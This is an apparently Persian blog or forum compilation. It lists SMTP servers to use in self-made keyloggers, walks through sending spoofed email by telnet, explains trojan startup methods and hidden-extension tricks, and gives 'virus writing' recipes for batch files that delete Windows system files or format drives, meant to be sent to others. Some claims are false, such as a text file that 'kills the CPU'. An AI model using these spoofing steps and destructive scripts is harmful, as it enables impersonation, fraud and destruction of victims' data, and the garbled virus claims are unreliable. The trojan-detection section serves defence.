به دلیل درخواست زیاد چند تا از دوستان که میخواستن ببینن برای کیلاگری که میسازند از چه smtp باید استفادهخ کنند این اموزش رو گذاشتم
smpt جدید هات میل:mx01.hotmail.com
SMTP های جدید یاهو به قرار زیر است:
e.mx.mail.yahoo.com
f.mx.mail.yahoo.com
g.mx.mail.yahoo.com
a.mx.mail.yahoo.com
b.mx.mail.yahoo.com
c.mx.mail.yahoo.com
d.mx.mail.yahoo.com
mta125.mail.re4.yahoo.com
mta119.mail.re1.yahoo.com
mta144.mail.re1.yahoo.com
mta249.mail.mud.yahoo.com
1- یکی از ساده ترین راهها استفاده از سایتهایی مثل google است که با جستجوی عبارت SMTP Server، هزاران سرور پیدا کنیم.
2- استفاده از SMTP Server سایت دانشگاهها. تجربه برایم ثابت کرده که این روش یکی از بهترینهاست.
3- استفاده از یکسری SMTP Server های مشهور. این روش هم بد نیست.
حالا روش را عملاً نشانتان میدهم:
اول باید یک سرور را مشخص کنید که از طریق آن می خواهید Fake Mail را بفرستید. همانطور که قبلاً گفتم، اگر مثلاً می خواهید برای یک نفر که Mail Box او در یاهو است، Fake Mail بزنید، سرور را همان سرور در نظر بگیرید یعنی از خود yahoo.com برای ارسال استفاده کنید. بعد باید ببینید که در این سرور کدام subdomain باید استفاده کنید (یعنی اینکه SMTP Server سرور آدرسش، mail.yahoo.com است یا mx.yahoo.com است یا چیز دیگر). برای این کار دو روش را میگوم:
1- از nslookup استفاده کنیم:
اول باید با whois یک Name Server پیدا کنیم و بعد از طریق آن، سایت را nslookup کنیم. مثلاً میخواهم SMTP Server مربوط به KsN.com را پیدا کنم. اول یک whois میکنم و می بینم که Name Server سایت، s1.sazin.com و s2.sazin.com است. حالا nslookup میکنم و آن سطرهایی را می خوانم که با نام MX مشخص شده است و دو تا آدرس می بینم که عبارتند از: KsN.com و mail.KsN.com پس SMTP Server های سایت KsN.com همین دو آدرس است. در نتیجه اگر بخواهم از سایت KsN.com برای ارسال Fake Mail استفاده کنم، از این آدرسها باید بهره گیرم.
2- استفاده از بعضی سایتهای خاص:
یکی از این سایتها، http://www.mob.net/~ted/tools/mx.php3 است. در این سایت، نام سایت را می نویسید و دکمه lookup را کلیک میکنید. مثلاً من نوشتم yahoo.com و به نتایج زیر رسیدم:
Domain Server: ns.mob.net
yahoo.com mail is handled by 5 mx4.mail.yahoo.com.
yahoo.com mail is handled by 1 mx1.mail.yahoo.com.
yahoo.com mail is handled by 1 mx2.mail.yahoo.com.
Domain Server: ns.cw.net
yahoo.com mail is handled by 5 mx4.mail.yahoo.com.
yahoo.com mail is handled by 1 mx1.mail.yahoo.com.
yahoo.com mail is handled by 1 mx2.mail.yahoo.com.
مشخص است که SMTP Server های سایت yahoo.com عبارتند از:
mx1.mail.yahoo.com, mx2.mail.yahoo.com, mx4.mail.yahoo.com
فرستادن ایمیل جعلی از طریق تلنت
هر سرور برای ارسال ایمیل از پروتکل SMTP استفاده میکنه. این پروتکل توانایی خواندن E-mail را نداره و فقط میتونه E-mail بفرسته.پورت ۲۵ : این پورت ۲۵ برای ارسال E-mail بهکار میره و این پورت از برنامه های SMTP Server برای ارسال استفاده می کنه. برای صحبت کردن با پورت ۲۵ اول باید یک Server پیدا کنیم که پورت ۲۵ در آن باز باشه و بعد باید طبق معمول از telnet برای ارتباط استفاده کنیم.
SMTP Server ها اهمیتی نمیدهند که شما کی هستید و به کی میخواهید میل بزنید، بلکه فقط کار خود را میکنند. پس به هر آدرس توجه کامل نکنین، شاید جعلی باشه چگونه یک SMTP سرور پیدا کنیم :
کار سختی نیست. ولی ما توصیه میکنم از سروری کمک بگیرین که مربوط به Mail Box قربانی است. SMTP Server در نهایت روی یک سرور قرار دارد پس در حتما آدرس آن چیزی مثل smtp.noavar.com، mx01.hotmail.com و ... هست.
سایت google رو باز کنید و عبارت SMTP Server را سرچ کنین. هزاران سرور پیدا می کنین.زود برین به آدرس http://www.mob.net/~ted/tools/mx.php3 بعد نام سایت را مینویسین و دکمه lookup را کلیک میکنین.(مثلا yahoo.com ) و می بینین:
Domain Server: ns.cw.net
yahoo.com mail is handled by 5 mx4.mail.yahoo.com.
yahoo.com mail is handled by 1 mx1.mail.yahoo.com.
yahoo.com mail is handled by 1 mx2.mail.yahoo.com.
مشخصه که SMTP Server های سایت yahoo.com عبارتند از: mx1.mail.yahoo.com , mx2.mail.yahoo.com , mx4.mail.yahoo.com
خوب حالا میخوایم به یه نفر (مثلا ای میل بزنیم و میخوایم که طرف خیال کنه که از طرف test_zabet@yahoo.com است. (هر دو در سایت یاهو) برای این کاراز telnet برای برقراری ارتباط استفاده می کنم. دستور زیر را در اعلان داس تایپ کنین.
telnet mx1.mail.yahoo.com 25
۲۵ همون شماره پورت ای میل هست و از سرور اصلی یاهو هم استفاده کردیم.خوب حالا شما باید این رو بینین:
220 YSmtp mta499.mail.yahoo.com ESMTP service ready
دقت کنید که چون از telnet استفاده میکنین، چیزهایی را که تایپ میکنین، نمیبینین و نمیتونید از دکمه BackSpace استفاده کنین.تایپ کنین HELO yahoo.com و جواب میشنویم: 250 mta499.mail.yahoo.com
حالا باید مشخص کنم که E-mail فرستنده چیه. پس مینویسم: MAIL FROM:test_zabet@yahoo.com
حالا باید بگم که این E-mail به چه آدرس ارسال بشه مثلآ RCPT TO: yaftz@yahoo.com
وDATAحالا باید بنویسم Enter بزنم و جواب میشنوم:354 go ahead
اینجا وقت تایپ کردن یک سری چیزهای اساسی است. اول مینویسم
From: R D test_zabet@yahoo.com این همان اسمی است که به عنوان Sender یا همان From دیده میشه. حالا مینویسم:salam و بعد Subject این هم در آن E-mail به عنوان subject دیده میشه.
MIME-Version: 1.0
Content-Type: text/plain;
خوب دوبار Enter زده و متن نامه را مینویسم:
دقت کنید که یک . (نقطه) در سطر آخر بنویسید و بعد Enter بزنید. با این روش به پورت ۲۵ میگیدکه متن نامه تمام شده.
مینویسم QUIT تا ارتباط قطع و از telnet خارج بشیم
فایل های INI. چه هستند؟
این فایل ها در حقیقت فایل های متنی (TXT) ساده هستند، که بوسیله برنامه Notepad می توان یک فایل (TXT) را به سادگی ایجاد کرد. این فایل ها بوسیله ویندوز و برنامه های تحت ویندوز مورد استفاده قرار می گیرند تا اطلاعاتی در مورد خواسته های شما و محیط عملکرد خود ذخیره کنند. INI. مخفف initialization است.
ساختار فایل INI.:
فایل INI. شامل یک یا چند بخش است هر بخش با یک نام بخش (section name) آغاز می شود که ممکن است، هیچ یا چندین ورودی وجود داشته باشد. که بعد از آن قرار می گیرد.
[بخش]
ارزش=نام کلید
اگر توضیحی وجود داشته باشد بعد از «سمی کالن» (;) قرار می گیرد.
ویندوز از چندین استاندارد برای فایل های INI. استفاده می کند تا اطلاعات پیکر بندی کامپیوتر را ذخیره کند. فایل هایی که این اطلاعات را نگهداری می کنند عبارتند از :
WIN.INI, SYSTEM.INI, PROGMAN.INI, PROTOCOL.INI, SHARED.INI, WINFILE.INI, CONTROL.INI, SCHDPLUS.INI
نرم افزارهای تحت ویندوز هم بعد از نصب شدن ممکن است قسمتهایی به WIN.INI اضافه کنند و همچنین خود فایل های INI. به دایرکتوری ویندوز اضافه کنند.
ایجاد تغییرات در فایل های INI.
چون فایل های INI. از یک متن ساده استفاده می کنند. بوسیله یک برنامه متنی ساده مانند Notepad می توانند ویرایش شوند.
همانطور که در شماره قبل وعده داده بودیم، در این شماره به بررسی روشهای مختلف به کار گرفته شده توسط ترواها برای اجرا شدن با هر بار اجرای ویندوز می پردازیم تا بتوانیم از این طریق آنها را شناسایی و حذف کنیم. اگرچه به روشهای قدیمی هم اشاره مختصری خواهیم کرد، فقط به بررسی روشهای امروزی می پردازیم. با اینکه در مورد حذف ترواها بعداً بیشتر خواهیم نوشت، پس از مطالعه این مقاله شما باید بتوانید نه تنها ترواها، بلکه سایر برنامه های احتمالاً مزاحمی را که با هر بار اجرای ویندوز شما خود را اجرا می کنند بیابید. اگرچه این متن کمی تخصصی به نظر می رسد، اصلاً وحشت نکنید، یکبار آن را با حوصله بخوانید و سپس بار دوم ضمن خواندن متن، کارهای نوشته شده در آن را انجام دهید.
روشهای مختلفی که یک برنامه می تواند از طریق آنها خود را با هر بار اجرای ویندوز اجرا کند عبارتند از:
1- استفاده از winstart.bat: در این روش که مناسب ویندوزهای قدیمی است، فایلی به نام winstart.bat در شاحه ویندوز ساخته می شود و برنامه از این فایل فراخوانی می شود؛ به این صورت که اگر این فایل موجود نباشد ساخته می شود و در غیر این صورت فقط نام برنامه به آن اضافه می شود.
2- استفاده از win.ini: در این روش که امروزه زیاد مورد استفاده قرار نمی گیرد، با نوشتن عبارت load=filename.exe (که به جای filename.exe نام برنامه قرار می گیرد) یا Run=filename.exe در قسمت [windows]، برنامه مورد نظر با هر بار اجرای ویندوز اجرا خواهد شد. برای باز کردن فایل Win.ini و مشاهده محتویات آن، بهترین روش استفاده از برنامه System configuration editor ویندوز است. برای اجرای این برنامه از منوی Start، Run را انتخاب کنید (یا کلید ویندوز کیبورد خود را بگیرید و سپس کلید R را فشار دهید)، تایپ کنید SysEdit و OK را فشار دهید. از بین فایلهای باز شده فایل مورد نظر را پیدا کنید. اگر دقیقاً با این فایلها آشنایی ندارید، مواظب باشید که تغییری در این فایلها ندهید و اگر دادید، تغییرات خود را ضبط نکنید.
3- استفاده از System.ini: این روش بسیار مشابه روش بالاست. و مانند بالا این فایل هم درون System configuration editor قابل مشاهده است. اگر در این فایل به عبارتی مشابه shell=Explorer.exe trojan.exe برخورد کردید، سیستم شما بلافاصله پس از اجرای explorer.exe، trojan.exe را اجرا خواهد کرد.
4- استفاده از Start up: هر برنامه ای که در منوی Start داخل قسمت Startup قرار بگیرد، با هر بار اجرای ویندوز خود به خود اجرا خواهد شد. Startup در ویندوزهای جدیدتر در قسمت All programs منوی Start قرار دارد.
5- استفاده از رجیستری: این روش که در حال حاضر متداولترین روش مورد استفاد ترواها و کرمها می باشد به این صورت است که نام فایل اجرایی به قسمت Run در رجیستری اضافه می گردد. رجیستری ویندوز حاوی اطلاعات مختلفی از سخت افزارها و نرم افزارهای گوناگون نصب شده روی سیستم شماست. برای مشاهده رجیستری، از منوی Start، Run را انتخاب کنید (یا کلید ویندوز کیبورد خود را بگیرید و سپس کلید R را فشار دهید) و در داخل جعبه متن آن تایپ کنید: RegEdit و OK را فشار دهید. اگر دقیقاً با رجیستری آشنایی ندارید، مواظب باشید که تغییری در آن ندهید. از میان قسمتهای مختلف رجیستری در اینجا ما با HKEY_CURRENT_USER و HKEY_LOCAL_MACHINE سروکار داریم. یکی از ایندو را انتخاب کنید و روی آن Double Click کنید (یا روی علامت + کنار آن کلیک کنید) حال به ترتیب گزینه های زیر را انتخاب کنید تا به Run برسید:
Software -> Microsoft -> Windows -> Current Version -> Run
در شرایطی که بیش از یک نفر از یک رایانه استفاده می کنند و روی آن کاربران مختلف تعریف کرده اند، معمولاً برنامه هایی که در قسمت Run موجود در HKEY_LOCAL_MACHINE نامشان نوشته شده باشد با هر بار اجرای ویندوز برای تمام کاربران آن اجرا می شوند اما برنامه هایی که نام آنها در HKEY_CURRENT_USER آمده باشد فقط برای کاربری که در حال حاضر از سیستم استفاده می کند اجرا خواهند شد.
ممکن است علاوه بر Run، گزینه هایی به نامهای RunOnce، RunServices یا RunServicesOnce را هم دیده باشید که آنها هم همین اثر را دارند با این تفاوت که اگر نام برنامه ای در RunOnce یا RunServicesOnce قرار بگیرد فقط یکبار یعنی فقط دفعه بعدی که ویندوز اجرا می شود به همراه ویندوز اجرا خواهد شد.
6- روش ShellOpen رجیستری: در رجیستری و در زیر کلیدهای زیر باید همیشه عبارت "%1" %* نوشته شده باشد اما اگر به عبارتی مانند trojan.exe "%1" %* برخورد کردید، بدانید که فایل Trojan.exe سعی دارد کاری کند با هر بار اجرای هر فایل اجرایی روی رایانه شما، او هم اجرا شود:
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command]
7- استفاده از روشهایی مانند Binding و جایگزینی: اگرچه روشهایی که در بالا نوشته شد حاوی تمامی روشهایی است که امروزه مورد استفاده قرار می گیرند، روشهای اجرا هرگز به موارد فوق ختم نمی شوند و همیشه جای ابتکار یا استفاده از روشهایی که فقط روی سیستمها یا در شرایط خاصی عمل کنند باز است بنابراین به صرف اینکه مطمئن شوید از طریق روشهای بالا سیستم شما آلوده نشده است کفایت نمی کند. به عنوان نمونه در روشهایی مانند Binding و جایگزینی که هنوز چندان مورد استفاده قرار نگرفته و پیش بینی می شود در آینده نزدیک بیشتر مورد استفاده قرار بگیرند، فایلی که قرار است با هر بار اجرای ویندوز خود را اجرا کند، فایل دیگری را پیدا می کند که این کار را انجام دهد و سپس خود را به آن می چسباند. به عنوان نمونه با تشخیص اینکه روی سیستم، فایل مربوط به ویندوز مسنجر با هر بار اجرای ویندوز اجرا می شود، کاری می کند که در هنگام اجرای ویندوز مسنجر، آن برنامه هم اجرا شود. اگر برنامه برای این کار خود را به فایل اجرایی مسنجر ویندوز بچسباند، می گویند از Binding استفاده کرده است اما اگر خود را جایگزین آن کند، می گویند از روش جایگزینی استفاده کرده است. اگرچه این روشها از قدیم توسط ویروسهای مختلف برای آلوده کردن فایلهای اجرایی به کار گرفته می شدند اما استفاده از این روش برای اجرای همزمان با ویندوز احتمالاً به زودی بیشتر مورد استفاده قرار خواهد گرفت.
پس از مطالعه روشهای بالا، احتمالاً شما هم با من هم عقیده هستید که پیدا کردن یک تروا به روش دستی کار چندان ساده ای نیست؛ اما اکثریت قریب به اتفاق ترواها از روشهای رجیستری استفاده می کنند و شما از تغییرات ایجاد شده در قسمتهای Run می توانید به آلوده شدن سیستم پی ببرید. یک ابزار بسیار عالی که در اکثر ویندوزها وجود دارد (در ویندوز 2000 وجود ندارد) ابزاری به نام System Configuration Utility است. برای اجرای این ابزار، از منوی Start، Run را انتخاب کنید (یا کلید ویندوز کیبورد خود را بگیرید و سپس کلید R را فشار دهید) و در داخل جعبه متن آن تایپ کنید: MSConfig و OK را فشار دهید. اگرچه این ابزار کاربردهای مختلفی دارد، ما در اینجا فقط به ذکر کاربردهایی از آن می پردازیم که به موضوع بحث ما بیشتر مربوط هستند. پس از باز شدن صفحه System Configuration Utility، از بالای صفحه Startup را انتخاب کنید. خواهید دید که اکثر فایلهایی که خود به خود همراه ویندوز شما اجرا می شوند در اینجا لیست شده اند و شما با حذف تیک کنار اسم آنها می توانید آنها را از کار بیندازید. در قسمت Startup item نامی که برنامه برای خود برگزیده است، در قسمت command، آدرس فایل اجرایی برنامه و در قسمت Location تکنیک مورد استفاده توسط برنامه برای اجرا را خواهید دید. توجه به نکات زیر هم در استفاده از MSConfig به شما کمک خواهد کرد:
1- چون معمولاً قسمتهای command و location فضای کافی برای نمایش کامل محتویات خود را ندارند، موش رایانه را روی خط جداکننده command از location یا خط انتهای location ببرید تا بتوانید اندازه این قسمتها را تغییر دهید.
2- عبارتهای HKCU و HKLM به ترتیب مخفف HKEY_LOCAL_MACHINE و HKEY_CURRENT_USER می باشند که در بالا و در تکنیک شماره 5 به آنها اشاره شد.
3- برای مشاهده فایلهای System.ini و win.ini، علاوه بر روش گفته شده در بالا (در مورد شماره 2) کافی است که از قسمت بالای MSConfig گزینه های SYSTEM.INI و WIN.INI را انتخاب کنید.
در این روش می توان فایل را در قسمت C:WindowsStartMenuProgramsstart کپی کرد البته شاخه ها مانند C:Windows متغییر است و بنا به دایرکتری نصب ویندوز شما فرق می کند .
روش 2
فایل Win.ini است ::
این فایل هم قدرت اجرایی دارد . مانند ::
run= trojan
NullPort=None
BaseCodePage=1256
روش 3
استفاده از فایل System.ini می باشد :
اگر شما پیدا کردید کد shell=Explorer.exe trojan.exe زیر را فایل trojan.exe بعد از Explorer.exe اجرا خواهد شد
پسوندهای پنهان فایلهای ویندوز
ممکن است از این موضوع آگاهی نداشته باشید، اما حتی اگر به ویندوز بگویید که تمام پسوندهای فایل را نشان دهد، هنوز هم فایلهایی وجود دارند که بطور پیش فرض مخفی شدهاند. همچنین هر برنامه نصب شدهایی میتواند پسوندها را پیکربندی کند تا پنهان شوند. در اینجا در مورد چگونگی انجام این کار و همچنین دلیل اینکه چرا برخی از پسوندهای پنهان میتوانند برای تعدادی از کاربرهای کامپیوتر خطرناک باشند، مثالهایی آورده شده است. به فرض اینکه شما قبلا ویندوز explorer را برای نشان دادن تمام پسوندهای پیکربندی کردهاید.
پسوندهای SHS
یک کپی از notepad.exe بگیرید و آن را روی desktop خود قرار دهید. Wordpad را باز کنید. روی notepad.exe کلیک کنید و آن را به سمت سند باز شده wordpad بکشید. روی notepad.exe کلیک کنید و آن را به عقب به سمت desktop بکشید. فایلی را که ایجاد شده است (Scrap) به Readme.txt تغییر نام دهید.
حالایک آیکن که نشان دهنده سند متنی است و فایلی با نام مشخص readme.txt بر روی desktop شما وجود دارد کلیک کردن بر روی فایل فوق باعث میشود notepad باز شود. اگر این فایل یک Trojan باشد، شما فریب خوردهاید و توسط آنچه که یک فایل متنی بیخطر بنظر میرسید آلوده شدهاید. اگر اجازه نمایش این پسوند داده می شد شما فریب فایل Readme.txt.shs را نمیخوردید.
پسوندهای PIF
اگر سعی کنید تا notepad.exe را به anything.txt.pif تغییر نام دهید، تنها فایلی با نام anything.txt روی desktop خود خواهید دید. و این بدین دلیل است که PIF پسوند دیگری است که ویندوز بطور پیش فرض پنهان میکند. اگر شما فایل را اجرا کنید برنامه اجرا خواهد شد، به خاطر اینکه ویندوز پسوندهای PIF را اجرا خواهد کرد حتی اگر آنها فایلهای اجرایی باشند.
پسوندهای SCR
پسوند دیگری که باید مراقب آن بود SCR است. کپی notepad.exe خود را به notepad.scr تغییر نام دهید و روی آن کلیک کنید. Notepad به عنوان یک فایل اجرایی اجرا خواهد شد. بسیاری از افراد توسط هکرهایی فریب میخورند که account یک قربانی را بدست آوردهاند. هکر email یا هر نوع پیغامی را به تمام دوستان قربانی میفرستد که “این صفحه نمایش جدید و بامزه را ببینید از خنده روده بر خواهید شد!” از آنجایی که این پیغام از یک منبع مطمئن آمده، اکثر افراد فریب خورده و فایل SCR را اجرا میکنند که در نهایت به هکری ختم میشود که به کامپیوتر شما متصل شده است.
فرمانهای خطرناکی که میتوانند گنجانده شوند
پسوندهای میانبر PIF
برخی از پسوندهای پنهان فایل قادرند به سادگی با فرمانهای پنهان شدهای که میتوانند برای سیستم شما مخرب باشند برنامهریزی شوند. این یک آزمایش ساده است:
دکمه راست ماوس خود را روی desktop کلیک کنید و New و سپس Shotcut را انتخاب نمایید. در Command line تایپ کنید:
format a:/autotest
Next را کلیک کنید. در “Select a name for the shortcut” تایپ کنید: readme.txt سپس Next را کلیک کنید. یک آیکن notepad را انتخاب کرده و Finish را کلیک کنید. حالا شما در desktop خود فایلی با نام readme.txt و با آیکن notepad دارید. مطمئن شوید که در درایو شما دیسکی است که از دست دادن آن برای شما اشکالی ندارد و روی آیکن کلیک کنید. فایلی که شما روی آن کلیک کردهاید درایو A: را فرمت خواهد کرد. البته آیکن هکر درایو دیگری را مورد هدف قرار خواهد داد یا ممکن است نامی همچون ‘game.exe’ و فرمانی برای حذف کردن دایرکتوری ویندوز شما یا (deltree /y C:\*.*) کل درایو C شما داشته باشد. اگر پسوند PIF پنهان نشود، قادر به فریب شما نخواهد بود.
پسوند SHS
فایلهای Scrap نیز میتوانند فرمانهای گنجانده شده را پنهان کند. این یک آزمون ساده است: از notepad.exe یک کپی بگیرید و آن را روی desktop خود قرار دهید. Wordpad را باز کنید.Notepad.exe را کلیک کنید و آن را به سمت سند باز شده wordpad بکشید. روی Edit کلیک کنید و Package Object و سپس Edit package را انتخاب کنید. روی Edit و سپس Command Line کلیک کنید.
در کادر، دستوری مانند format a:/autotest را تایپ کنید و روی OK کلیک کنید. آیکن نیز میتواند از این پنجره تغییر یابد. از پنجره خارج شوید، این کار سند را به روز خواهد کرد. روی notepad.exe کلیک کنید و آن را به عقیب به سمت Desktop بکشید. فایلی را که ایجاد شده (Scrap) به Readme.txt تغییر نام دهید.
حالا شما آنچه را که شبیه یک فایل متنی است دارید. اگر این فایل اجرا شود درایو A: را فرمت خواهد کرد. همانگونه که در مثال بالا برای پسوندهای میانبر PIF دیده شد، هکر میتواند از فرمانهای خطرناکتری استفاده کند.
روشهای Trojan در هنگام راه اندازی
روشهای راه اندازی استاندارد
اکثر افراد از راههای متفاوتی که هکرها برای راه اندازی فایلهای Trojan استفاده میکنند آگاه نیستند. اگر هکری کامپیوتر شما را با یک Trojan آلوده کند، نیاز به انتخاب یک روش راهاندازی خواهد داشت، بگونهای که در زمان راهاندازی مجدد کامپیوتر شما Trojan بارگذاری شود. روشهای معمول راهاندازی شامل کلیدهای اجرایی registry، فولدر راه اندازی ویندوز، Windows Load= یا run=lines یافته شده در فایل win.ini و shell=line یافته شده در system.ini ویندوز میباشند.
روشهای راه اندازی خطرناک
از آنجایی که فقط تعداد اندکی از این روشهای راه اندازی وجود دارند، هکرهای زیادی را یافتهایم که در پیدا کردن روشهای جدید راهاندازی افراط میکنند. این شامل استفاده از تغییرات خطرناکی در سیستم registry میباشد، که در صورتی که فایل Trojan یا فایل همراه آن از بین برود سیستم را بصورت بلااستفاده درخواهد آورد. این یک دلیل استفاده نکردن از نرم افزار ضد ویروس برای از بین بردن Trojanهاست. اگر یکی از این روشها استفاده شود، و فایل بدون ثابت کردن registry سیستم از بین برود، سیستم شما قادر به اجرای هیچگونه برنامهای پس از راه اندازی مجدد کامپیوترتان نخواهد بود.
قبل از آنکه سراغ registry برویم لازم به توضیح است که یک فولدر به صورت C:\WINDOWS\StartMenu\Program\StartUp وجود دارد که هر فایلی در اینجا باشد هنگام راه اندازی ویندوز اجرا خواهد شد.توجه داشته باشید که هرگونه تغییری میتواند سیستم شما را به خطر بیاندازد بنابراین، هرچه ما میگوییم انجام دهید. برای دستیابی به registry به منوی start>run> بروید و “regedit” را بدون علامت ” ” تایپ کنید. در registry چندین مکان برای راه اندازی Startup وجود دارد که لیستی از آنها را در اینجا می آوریم.
[HKEY_CLASSES_ROOT\exefile\shell\open\command] =”\”%1\” %*”
[HKEY_CLASSES_ROOT\comfile\shell\open\command] =”\”%1\” %*”
[HKEY_CLASSES_ROOT\batfile\shell\open\command] =”\”%1\” %*”
[HKEY_CLASSES_ROOT\htafile\Shell\Open\Command]=”\”%1\” %*”
[HKEY_CLASSES_ROOT\piffile\shell\open\command] =”\”%1\” %*”
[HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command] =”\”%1\” %*”
[HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command]=”\”%1\” %*”
[HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command]=”\”%1\”%*”
[HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\Open\Command]=”\”%1\”%*”
[HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command]=”\”%1\”%*”
اگر این کلیدها مقدار “\”%1\”%*” را نداشته باشند و به جای اجرای فایل در هنگام راه اندازی به “\”Server.exe %1\” %*” تغییر یابد به احتمال زیاد یک Trojan است.
روش راه اندازی ICQ
روشی راه اندازی دیگری که امروزه استفاده از آن معمول است شناسایی شبکه ICQ میباشد. بسیاری از کاربران ICQ نمیدانند که هکر میتواند یک خط پیکربندی را به ICQ اضافه نماید تا با هر بار بارگذاری شدن برنامه Trojan نیز راه اندازی شود. به عنوان آزمایش مراحل زیر را انجام دهید:
ICQ را باز کنید. روی آیکن ICQ کلیک کنید و preference را انتخاب نمایید. روی Edit launch List کلیک کنید. روی Add کلیک کنید. روی Browse کلیک کنید. فایلی را برای اضافه کردن به Windows\notepad.exe بیابید که به کار این آزمایش بیاید. روی Open و سپس OK کلیک کنید. زمانی که شما ICQ را راه اندازی مجدد میکنید فایل اجرا خواهد شد.
آموزش ساختن ویروس [ویروس نویسی] |
امروز میخوام آموزش ساختن یه ویروس رو بهتون یاد بدم. این ویروس هم مثل بلستر پس ازاجرا با دادن مدت زمان 30 ثانیه کامپیوتر شما رو خاموش میکنه. برای ساختن این ویروس ابتدا روی صفحه دسکتاب راست کلیک کنید. سپس new و بعد از اون text document رو انتخاب کنید. سپس وارد این فایل متنی شده و این عبارت رو تایپ کنید. Shutdown –r حالا از منوی فایل save as رو انتخاب کنید. در قسمت file name اسم فایل رو مشخص کنید. توجه کنید که این اسم حتما با پسوند bat باشه.مثل rockboys.bat در قسمت encoding شما باید ANSI رو انتخاب کنید. حالا save کنید. شما میتونید این فایل رو روی خودتون اجرا کنید و نتیجه کار رو ببینید. برای اینکه از خاموش شدن کامپیوترتون جلوگیری کنید کافیه در قسمت run عبارت زیر رو تایپ کنید. Shutdown –a
|
آموزش ساختن بد ترین وآزاردهنده ترین ویروس در دنیا (Blastr&saser) [ویروس نویسی] |
1. روی دسک تاپ رایت کلیک کنید وازگزینه ی new - text document را انتخاب کنید. 2. حالا وارد text document شوید ودر آن عبارت زیررا تایپ کنید. cpu_567hjkblaster 3. بعد از سیو کردن آنرا rename کرده و اسمی برایش انتخاب کنید. حالا اگه فایل رو اجرا کنید باید فاتحه ی cpu رو بخونین.
|
اینم یه ویروس باحال در win xp : [ویروس نویسی] |
:c del autoexec.bat del config.sys cd winnt del system.ini del win.ini بعد فایل رو با پسوند bat .سیو کنید. مثل این : nofooz.bat این فایل رو وقتی برای کسی بفرستید هیچی نمیشه ولی وقتی اجراش کنه و کامپیوترش رو ریست کنه دیگه ویندوزش بالا نمیاد . من ویروس رو برای راحتی کارتون گذاشتم ولی مواظب باشید خودتون اجراش نکنید .
|
نوشتن یه ویروس ساده ولی خطرناک [ویروس نویسی] |
|
ویروسی که شناسایی نمیشه [ویروس نویسی] |
سلام دوستان امروز با یه آموزش بسیار خفن اومدم این ویروس قابلیتی که داره اینه که هیچ آنتی ویروسی نمی تونه در برابرش کاری کنه و بعد از ری استارت ویندوز فرمت میشه برای ساختن این ویروس مراحل زیر رو انجام بدید به نوت پد رفته و این عبارت رو بنویسید del autotexec.bat
|
یک ویروس برای فرمت کردن درایو C شخص مورد نظر [ویروس نویسی] |
برنامه NotePad رو باز کنین بعد فرمان زیر رو توش کپی و پیست کنید: @echo off
------------------------ راستی اگه هم بخواین تعداد و نام پارتیشن مورد نظر رو با کمی تغییر توی فرمان ها می تونین تعیین کنین
|
آموزش ساخت یک ویروس که اگر اجرا بشه پس از ریست ، کامپیوتر دیگه بالا نمیاد... [ویروس نویسی] |
خوب اول یک Notepad یا همان Txt Document باز می کنید بعد دستور زیر را توی اون کپی میکنید و با فرمت Bat سیو میکنید... C: del autoexec.bat مثل: Virus.bat به جای کلمه ویروس هم اسم مورد نظر را بگذارید... ************************************************** آموزش ساخت ویروس های قوی و کشنده . |
بازی مین روب یا Minesweeper چندین سال است که همراه ویندوز به عنوان یک بازی محبوب ارائه می شود. اگر شما نیز به این بازی علاقمند هستید و می خواهید همیشه در آن پیروز باشید، مراحل زیر را طی کنید:
1- وارد بازی Minesweeper شوید.
2- عبارت xyzzyرا در حالی که پنجره Minesweeper فعال است ، تایپ کنید و کلیدهای Shift + Enterرا فشار دهید.
3- تمامی پنجره های دیگر را Minimize کنید تا Desktop ویندوز را مشاهده کنید.
خوب حالا شروع به بازی کنید .زمانی که نشانگر ماوس را روی خانه ای می آورید که دارای مین است ، نقطه ای کوچک در گوشه بالا و سمت چپ دسک تاپ سیاه می شود و زمانی که ماوس را روی یک خانه امن ببرید، همان نقطه سفید می شود.
با این روش می توانید دوستان خود را حیرت زده کنید زیرا این نقطه کوچک توجه کمتر کسی را به خود جلب میکند.
ترفنـــــــــــــــــــــــــــد:
برای اینکه بعد از قرار دادن کنترل هاتون نخواید دوباره فونت تک تک اونها رو تغییر بدهید برای این کار قبل از قرار دادن اونها روی فرم ابتدا فونت فرم رو به فونت مورد نظرتون که من Tahoma رو پیشنهاد میکنم تغییر بدهید و سپس هر کنترلی که روی فرم قرار بدهید با فونت فرم یکی میشود
نکتـــــــــــــــــــــــــــــه:
برای حرکت دادن کنترل های رو فرم به صورت دقیق تر و بدون لرزش میتونید این کار رو با کیبرد انجام بدهید که فقط روی کنترل مورد نظر کلیک کنید و سپس کلید کنترل رو پایین نگه دارید و با کلید های مکان نما اون رو جابجا کنید که این کار رو می تونید با انتخاب دسته جمعی کنترل ها هم انجام بدهید
نکتـــــــــــــــــــــــــــــه:
برای تغییر اندازه کنترل های روی فرم میتونید ابتدا انها را انتخاب کنید و سپس کلید شیفت رو پایین نگه دارید و با کلید های مکان نما اونها رو تغییر اندازه بدهید
نکتـــــــــــــــــــــــــــــه:
بعضی مواقع شما نوشته داخل یک کنترل مثل یک Label رو به فارسی تغییر میدهید که این عبارت به درستی نشان داده نخواهد شد که برای رفع این مشکل باید فونت اون کنترل رو به Tahoma تغییر دهید
نکتـــــــــــــــــــــــــــــه:
برای اینکه در پنجره خصوصیت اشیاء سریعتر به خصوصیت مورد نظر پرش کنید میتوانید با نگه داشتن کلید کنترل و شیفت و زدن اولین حرف خصوصیت مورد نظر به ان پرش کنید
برنامه نمونه مشاور املاک(درخواستی)
کدهای اماده برای کار های مختلف
بخش اول ویژوال بیسیک شبیه سازی شده(انگلیسی) بخش دوم بخش سوم
فارسی ساز ویژوال بیسیک ( در فایل متنی داخلش توضیح دادم ) بخش اول
پسوردش هم : VBLog.blogfa است حتمــــــــــــــــــــــــا دانلود کنید هر بخش ۱۵۰ کیلو بایت است
بخش دوم بخش سوم بخش چهارم بخش پنجم بخش ششم بخش هفتم بخش هشتم بخش نهم
پنجره شناور (اقا کمال) قسمتی از وی بی
اکواریــــــــــــــــــــــــــــــــم
جالبــــــــــــــــــــــــــــــــه
توابــــــــــــــــــــــــــع
ماتریکس برای بچه های مهندسی و ریاضی
